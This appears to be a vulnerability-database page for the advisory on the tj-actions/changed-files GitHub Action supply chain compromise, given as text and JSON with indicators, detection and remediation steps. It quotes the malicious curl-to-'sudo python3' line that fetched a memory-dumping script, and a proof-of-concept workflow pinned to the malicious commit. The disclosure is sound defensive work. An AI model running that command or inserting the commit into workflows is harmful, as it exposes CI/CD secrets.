ghsa-mrrh-fwg8-r2c3
Vulnerability from github
Published
2025-03-15 06:30
Modified
2025-03-24 14:23
Severity ?
8.6 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Summary
tj-actions changed-files through 45.0.7 allows remote attackers to discover secrets by reading actions logs.
Details

Summary

A supply chain attack compromised the tj-actions/changed-files GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between March 14 and March 15, 2025, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.

This has been patched in v46.0.1.

Details

The attack involved modifying the tj-actions/changed-files GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs.

Key Indicators of Compromise (IoC):

  • Malicious commit: 0e58ed8671d6b60d0890c21b07f8835ace038e67
  • Retroactively updated tags pointing to the malicious commit:
  • v1.0.0: 0e58ed8671d6b60d0890c21b07f8835ace038e67
  • v35.7.7-sec: 0e58ed8671d6b60d0890c21b07f8835ace038e67
  • v44.5.1: 0e58ed8671d6b60d0890c21b07f8835ace038e67

Malicious Code Execution:

The malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs:
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3`

This script targeted the Runner Worker process, extracting and exfiltrating its memory contents.

Proof of Concept (PoC)

Steps to Reproduce:

  1. Create a GitHub Actions workflow using the tj-actions/changed-files action:

yml name: "tj-action changed-files incident" on: pull_request: branches: - main jobs: changed_files: runs-on: ubuntu-latest steps: - name: Get changed files id: changed-files uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67 2. Run the workflow and inspect the logs in the Actions tab.
3. Vulnerable workflows may display secrets in the logs.

Detection:

Analyze network traffic using Harden-Runner, which detects unauthorized outbound requests to:
- gist.githubusercontent.com

Live reproduction logs:
đź”— Harden-Runner Insights

This attack was detected by StepSecurity when anomaly detection flagged an unauthorized outbound network call to gist.githubusercontent.com.

Duration of Vulnerability

The vulnerability was active between March 14 and March 15, 2025.

Action Required

  1. Review your workflows executed between March 14 and March 15:
  2. Check the changed-files section for unexpected output.
  3. Decode suspicious output using the following command:
    echo 'xxx' | base64 -d | base64 -d

  4. If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately.

  5. Update workflows referencing the compromised commit:

  6. If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version.

  7. Tagged versions:

  8. If you are using tagged versions (e.g., v35, v44.5.1), no action is required as these tags have been updated and are now safe to use.

  9. Rotate potentially exposed secrets:

  10. As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows.

Impact

  • Type of vulnerability: Supply chain attack, Secrets exposure, Information leakage
  • Who is impacted:
  • Over 23,000 repositories using tj-actions/changed-files.
  • Organizations with public repositories are at the highest risk, as their logs may already be compromised.
  • Potential consequences:
  • Theft of CI/CD secrets (API keys, cloud credentials, SSH keys).
  • Unauthorized access to source code, infrastructure, and production environments.
  • Credential leaks in public repositories, enabling further supply chain attacks.
Show details on source website

To clipboard 

{
   affected: [
      {
         database_specific: {
            last_known_affected_version_range: "<= 45.0.7",
         },
         package: {
            ecosystem: "GitHub Actions",
            name: "tj-actions/changed-files",
         },
         ranges: [
            {
               events: [
                  {
                     introduced: "0",
                  },
                  {
                     fixed: "46.0.1",
                  },
               ],
               type: "ECOSYSTEM",
            },
         ],
      },
   ],
   aliases: [
      "CVE-2025-30066",
   ],
   database_specific: {
      cwe_ids: [
         "CWE-506",
      ],
      github_reviewed: true,
      github_reviewed_at: "2025-03-15T16:39:06Z",
      nvd_published_at: "2025-03-15T06:15:12Z",
      severity: "HIGH",
   },
   details: "### Summary  \nA supply chain attack compromised the **tj-actions/changed-files** GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between **March 14 and March 15, 2025**, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.\n\nThis has been patched in [v46.0.1](https://github.com/tj-actions/changed-files/releases/tag/v46.0.1).\n\n### Details  \nThe attack involved modifying the **tj-actions/changed-files** GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs.  \n\n#### Key Indicators of Compromise (IoC):  \n- **Malicious commit**: [0e58ed8671d6b60d0890c21b07f8835ace038e67](https://github.com/tj-actions/changed-files/commit/0e58ed8671d6b60d0890c21b07f8835ace038e67)  \n- **Retroactively updated tags pointing to the malicious commit**:  \n  - `v1.0.0`: 0e58ed8671d6b60d0890c21b07f8835ace038e67  \n  - `v35.7.7-sec`: 0e58ed8671d6b60d0890c21b07f8835ace038e67  \n  - `v44.5.1`: 0e58ed8671d6b60d0890c21b07f8835ace038e67  \n\n#### Malicious Code Execution:  \nThe malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs:  \n```\nB64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3`\n```\n\nThis script targeted the **Runner Worker process**, extracting and exfiltrating its memory contents.  \n\n### Proof of Concept (PoC)  \n#### Steps to Reproduce:  \n1. Create a GitHub Actions workflow using the **tj-actions/changed-files** action:  \n\n```yml\nname: \"tj-action changed-files incident\"\non:\n  pull_request:\n    branches:\n      - main\njobs:\n  changed_files:\n    runs-on: ubuntu-latest\n    steps:\n      - name: Get changed files\n        id: changed-files\n        uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67\n```\n2. Run the workflow and inspect the logs in the Actions tab.  \n3. Vulnerable workflows may display secrets in the logs.  \n\n#### Detection:  \nAnalyze network traffic using [Harden-Runner](https://github.com/step-security/harden-runner), which detects unauthorized outbound requests to:  \n- `gist.githubusercontent.com`  \n\nLive reproduction logs:  \nđź”— [Harden-Runner Insights](https://app.stepsecurity.io/github/step-security/github-actions-goat/actions/runs/13866127357)  \n\nThis attack was detected by **StepSecurity** when anomaly detection flagged an unauthorized outbound network call to `gist.githubusercontent.com`.  \n\n### Duration of Vulnerability  \nThe vulnerability was active between **March 14 and March 15, 2025**.  \n\n### Action Required  \n1. **Review your workflows executed between March 14 and March 15**:  \n   - Check the **changed-files** section for unexpected output.  \n   - Decode suspicious output using the following command:  \n     ```\n     echo 'xxx' | base64 -d | base64 -d\n     ```\n   - If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately.  \n\n2. **Update workflows referencing the compromised commit**:  \n   - If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version.  \n\n3. **Tagged versions**:  \n   - If you are using tagged versions (e.g., `v35`, `v44.5.1`), no action is required as these tags have been updated and are now safe to use.  \n\n4. **Rotate potentially exposed secrets**:  \n   - As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows.  \n\n### Impact  \n- **Type of vulnerability**: Supply chain attack, Secrets exposure, Information leakage  \n- **Who is impacted**:  \n  - Over 23,000 repositories using **tj-actions/changed-files**.  \n  - Organizations with public repositories are at the highest risk, as their logs may already be compromised.  \n- **Potential consequences**:  \n  - Theft of CI/CD secrets (API keys, cloud credentials, SSH keys).  \n  - Unauthorized access to source code, infrastructure, and production environments.  \n  - Credential leaks in public repositories, enabling further supply chain attacks.",
   id: "GHSA-mrrh-fwg8-r2c3",
   modified: "2025-03-24T14:23:37Z",
   published: "2025-03-15T06:30:34Z",
   references: [
      {
         type: "WEB",
         url: "https://github.com/tj-actions/changed-files/security/advisories/GHSA-mw4p-6x4p-x5m5",
      },
      {
         type: "ADVISORY",
         url: "https://nvd.nist.gov/vuln/detail/CVE-2025-30066",
      },
      {
         type: "WEB",
         url: "https://github.com/espressif/arduino-esp32/issues/11127",
      },
      {
         type: "WEB",
         url: "https://github.com/modal-labs/modal-examples/issues/1100",
      },
      {
         type: "WEB",
         url: "https://github.com/tj-actions/changed-files/issues/2463",
      },
      {
         type: "WEB",
         url: "https://github.com/tj-actions/changed-files/issues/2464",
      },
      {
         type: "WEB",
         url: "https://github.com/tj-actions/changed-files/issues/2477",
      },
      {
         type: "WEB",
         url: "https://github.com/chains-project/maven-lockfile/pull/1111",
      },
      {
         type: "WEB",
         url: "https://github.com/rackerlabs/genestack/pull/903",
      },
      {
         type: "WEB",
         url: "https://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066",
      },
      {
         type: "WEB",
         url: "https://www.sweet.security/blog/cve-2025-30066-tj-actions-supply-chain-attack",
      },
      {
         type: "WEB",
         url: "https://www.stream.security/post/github-action-supply-chain-attack-exposes-secrets-what-you-need-to-know-and-how-to-respond",
      },
      {
         type: "WEB",
         url: "https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised",
      },
      {
         type: "WEB",
         url: "https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-github-action-cve-2025-30066",
      },
      {
         type: "WEB",
         url: "https://web.archive.org/web/20250315060250/https://github.com/tj-actions/changed-files/issues/2463",
      },
      {
         type: "WEB",
         url: "https://sysdig.com/blog/detecting-and-mitigating-the-tj-actions-changed-files-supply-chain-attack-cve-2025-30066",
      },
      {
         type: "WEB",
         url: "https://semgrep.dev/blog/2025/popular-github-action-tj-actionschanged-files-is-compromised",
      },
      {
         type: "WEB",
         url: "https://news.ycombinator.com/item?id=43367987",
      },
      {
         type: "WEB",
         url: "https://github.com/tj-actions/changed-files/releases/tag/v46.0.1",
      },
      {
         type: "WEB",
         url: "https://github.com/tj-actions/changed-files/blob/45fb12d7a8bedb4da42342e52fe054c6c2c3fd73/README.md?plain=1#L20-L28",
      },
      {
         type: "PACKAGE",
         url: "https://github.com/tj-actions/changed-files",
      },
      {
         type: "WEB",
         url: "https://github.com/github/docs/blob/962a1c8dccb8c0f66548b324e5b921b5e4fbc3d6/content/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions.md?plain=1#L191-L193",
      },
      {
         type: "WEB",
         url: "https://blog.gitguardian.com/compromised-tj-actions",
      },
   ],
   schema_version: "1.4.0",
   severity: [
      {
         score: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
         type: "CVSS_V3",
      },
   ],
   summary: "tj-actions changed-files through 45.0.7 allows remote attackers to discover secrets by reading actions logs.",
}


Log in or create an account to share your comment.

Security Advisory comment format.

This schema specifies the format of a comment related to a security advisory.

UUIDv4 of the comment
UUIDv4 of the Vulnerability-Lookup instance
When the comment was created originally
When the comment was last updated
Title of the comment
Description of the comment
The identifier of the vulnerability (CVE ID, GHSA-ID, PYSEC ID, etc.).



Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.